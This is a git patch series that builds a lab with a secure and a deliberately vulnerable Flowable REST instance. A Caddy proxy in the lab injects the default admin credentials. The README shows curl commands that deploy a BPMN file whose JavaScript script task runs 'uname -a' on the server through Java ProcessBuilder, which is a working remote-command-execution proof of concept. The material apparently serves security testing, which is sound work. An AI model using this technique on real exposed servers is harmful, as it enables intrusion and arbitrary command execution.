From c8343015167ddb21e50395002210d9269d122843 Mon Sep 17 00:00:00 2001
From: devampkid <devampkid@gmail.com>
Date: Wed, 13 Aug 2025 03:48:05 +0400
Subject: [PATCH 1/5] Flowable exposed UI

---
 flowable/exposed_ui/README.md | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 flowable/exposed_ui/README.md

diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md
new file mode 100644
index 00000000..7a2e975a
--- /dev/null
+++ b/flowable/exposed_ui/README.md
@@ -0,0 +1,21 @@
+# Exposed UI Setup
+```bash
+docker run -p 127.0.0.1:8080:8080 flowable/flowable-rest
+```
+
+# How to Exploit the Exposed UI
+```bash
+curl -X POST \
+    'http://localhost:4200/flowable-rest/service/repository/deployments' \
+    -H 'Content-Type: multipart/form-data' \
+    -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \
+    -F 'file=@jsScript.bpmn'
+
+curl -X POST \
+    'http://localhost:4200/flowable-rest/service/runtime/process-instances' \
+    -H 'Content-Type: application/json' \
+    -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \
+    -d '{
+    "processDefinitionKey": "jsScriptProcess"
+    }'
+```
\ No newline at end of file

From 16062c163037a17e04f2bfbf2b30d792bab63c96 Mon Sep 17 00:00:00 2001
From: devampkid <devampkid@gmail.com>
Date: Wed, 13 Aug 2025 04:02:18 +0400
Subject: [PATCH 2/5] minor: fix ports of curl cmds

---
 flowable/exposed_ui/README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md
index 7a2e975a..f6b28938 100644
--- a/flowable/exposed_ui/README.md
+++ b/flowable/exposed_ui/README.md
@@ -6,13 +6,13 @@ docker run -p 127.0.0.1:8080:8080 flowable/flowable-rest
 # How to Exploit the Exposed UI
 ```bash
 curl -X POST \
-    'http://localhost:4200/flowable-rest/service/repository/deployments' \
+    'http://localhost:8080/flowable-rest/service/repository/deployments' \
     -H 'Content-Type: multipart/form-data' \
     -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \
     -F 'file=@jsScript.bpmn'
 
 curl -X POST \
-    'http://localhost:4200/flowable-rest/service/runtime/process-instances' \
+    'http://localhost:8080/flowable-rest/service/runtime/process-instances' \
     -H 'Content-Type: application/json' \
     -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \
     -d '{

From 1124b318f07a64d95e07fa53eda7676188b801f8 Mon Sep 17 00:00:00 2001
From: devampkid <devampkid@gmail.com>
Date: Wed, 13 Aug 2025 04:16:33 +0400
Subject: [PATCH 3/5] add jsScript.bpmn

---
 flowable/exposed_ui/jsScript.bpmn | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 flowable/exposed_ui/jsScript.bpmn

diff --git a/flowable/exposed_ui/jsScript.bpmn b/flowable/exposed_ui/jsScript.bpmn
new file mode 100644
index 00000000..0ec2779e
--- /dev/null
+++ b/flowable/exposed_ui/jsScript.bpmn
@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL"
+             xmlns:flowable="http://flowable.org/bpmn"
+             targetNamespace="Examples">
+
+  <process id="jsScriptProcess" name="JavaScript Script Process">
+    <startEvent id="start" />
+    <sequenceFlow sourceRef="start" targetRef="scriptTask" />
+    <scriptTask id="scriptTask" name="Execute Command via JavaScript" 
+                scriptFormat="javascript" 
+                flowable:autoStoreVariables="true">
+      <script>
+        var ProcessBuilder = Java.type('java.lang.ProcessBuilder');
+        var Arrays = Java.type('java.util.Arrays');
+        var Scanner = Java.type('java.util.Scanner');
+        
+        var processBuilder = new ProcessBuilder(Arrays.asList('uname', '-a'));
+        var process = processBuilder.start();
+        
+        var scanner = new Scanner(process.getInputStream()).useDelimiter("\\A");
+        var result = scanner.hasNext() ? scanner.next() : "";
+        
+        execution.setVariable('commandOutput', result);
+      </script>
+    </scriptTask>
+    <sequenceFlow sourceRef="scriptTask" targetRef="end" />
+    <endEvent id="end" />
+  </process>
+
+</definitions>

From 1a54d32ee84cdbf6d8b52615d40fc48eeb08f809 Mon Sep 17 00:00:00 2001
From: devampkid <devampkid@gmail.com>
Date: Wed, 13 Aug 2025 14:36:48 +0400
Subject: [PATCH 4/5] finished the setup

---
 flowable/exposed_ui/Caddyfile          |  5 +++++
 flowable/exposed_ui/README.md          |  4 ++--
 flowable/exposed_ui/docker-compose.yml | 24 ++++++++++++++++++++++++
 3 files changed, 31 insertions(+), 2 deletions(-)
 create mode 100644 flowable/exposed_ui/Caddyfile
 create mode 100644 flowable/exposed_ui/docker-compose.yml

diff --git a/flowable/exposed_ui/Caddyfile b/flowable/exposed_ui/Caddyfile
new file mode 100644
index 00000000..a5808bf7
--- /dev/null
+++ b/flowable/exposed_ui/Caddyfile
@@ -0,0 +1,5 @@
+:8081 {
+    reverse_proxy flowable:8080 {
+        header_up Authorization "Basic cmVzdC1hZG1pbjp0ZXN0"
+    }
+}
\ No newline at end of file
diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md
index f6b28938..438b4920 100644
--- a/flowable/exposed_ui/README.md
+++ b/flowable/exposed_ui/README.md
@@ -6,13 +6,13 @@ docker run -p 127.0.0.1:8080:8080 flowable/flowable-rest
 # How to Exploit the Exposed UI
 ```bash
 curl -X POST \
-    'http://localhost:8080/flowable-rest/service/repository/deployments' \
+    'http://localhost:8081/flowable-rest/service/repository/deployments' \
     -H 'Content-Type: multipart/form-data' \
     -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \
     -F 'file=@jsScript.bpmn'
 
 curl -X POST \
-    'http://localhost:8080/flowable-rest/service/runtime/process-instances' \
+    'http://localhost:8081/flowable-rest/service/runtime/process-instances' \
     -H 'Content-Type: application/json' \
     -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \
     -d '{
diff --git a/flowable/exposed_ui/docker-compose.yml b/flowable/exposed_ui/docker-compose.yml
new file mode 100644
index 00000000..216aeb5d
--- /dev/null
+++ b/flowable/exposed_ui/docker-compose.yml
@@ -0,0 +1,24 @@
+version: '3'
+
+services:
+  flowable:
+    image: flowable/flowable-rest
+    container_name: flowable-rest
+    networks:
+      - flowable-network
+
+  caddy:
+    image: caddy:2.8.4
+    container_name: caddy-proxy
+    ports:
+      - "8081:8081"
+    volumes:
+      - ./Caddyfile:/etc/caddy/Caddyfile
+    networks:
+      - flowable-network
+    depends_on:
+      - flowable
+
+networks:
+  flowable-network:
+    driver: bridge
\ No newline at end of file

From cc2800002541a49fe29b344f8ca8eeb92c266711 Mon Sep 17 00:00:00 2001
From: devampkid <devampkid@gmail.com>
Date: Tue, 30 Sep 2025 20:06:44 +0400
Subject: [PATCH 5/5] updated README.md contains both secure and vulnerable
 setup instructions

---
 flowable/exposed_ui/README.md          | 13 +++++++------
 flowable/exposed_ui/docker-compose.yml |  2 ++
 2 files changed, 9 insertions(+), 6 deletions(-)

diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md
index 438b4920..5f9bdcc2 100644
--- a/flowable/exposed_ui/README.md
+++ b/flowable/exposed_ui/README.md
@@ -1,21 +1,22 @@
-# Exposed UI Setup
+# Setup secure and vulnerable Flowable instances
 ```bash
-docker run -p 127.0.0.1:8080:8080 flowable/flowable-rest
+docker compose up
 ```
+test secure instance with this URL: http://localhost:8080/flowable-rest/service/repository/deployments
+test vulnerable instance with this URL: http://localhost:8081/flowable-rest/service/repository/deployments
 
-# How to Exploit the Exposed UI
+# How to Exploit the Exposed UI (on Vulnerable Instance)
 ```bash
 curl -X POST \
     'http://localhost:8081/flowable-rest/service/repository/deployments' \
     -H 'Content-Type: multipart/form-data' \
-    -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \
     -F 'file=@jsScript.bpmn'
 
 curl -X POST \
     'http://localhost:8081/flowable-rest/service/runtime/process-instances' \
     -H 'Content-Type: application/json' \
-    -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \
     -d '{
     "processDefinitionKey": "jsScriptProcess"
     }'
-```
\ No newline at end of file
+```
+Look for the `"variables":[{"name":"commandOutput","type":"string","value":"` at output of the last command.
\ No newline at end of file
diff --git a/flowable/exposed_ui/docker-compose.yml b/flowable/exposed_ui/docker-compose.yml
index 216aeb5d..7a7ec456 100644
--- a/flowable/exposed_ui/docker-compose.yml
+++ b/flowable/exposed_ui/docker-compose.yml
@@ -4,6 +4,8 @@ services:
   flowable:
     image: flowable/flowable-rest
     container_name: flowable-rest
+    ports:
+      - "8080:8080"
     networks:
       - flowable-network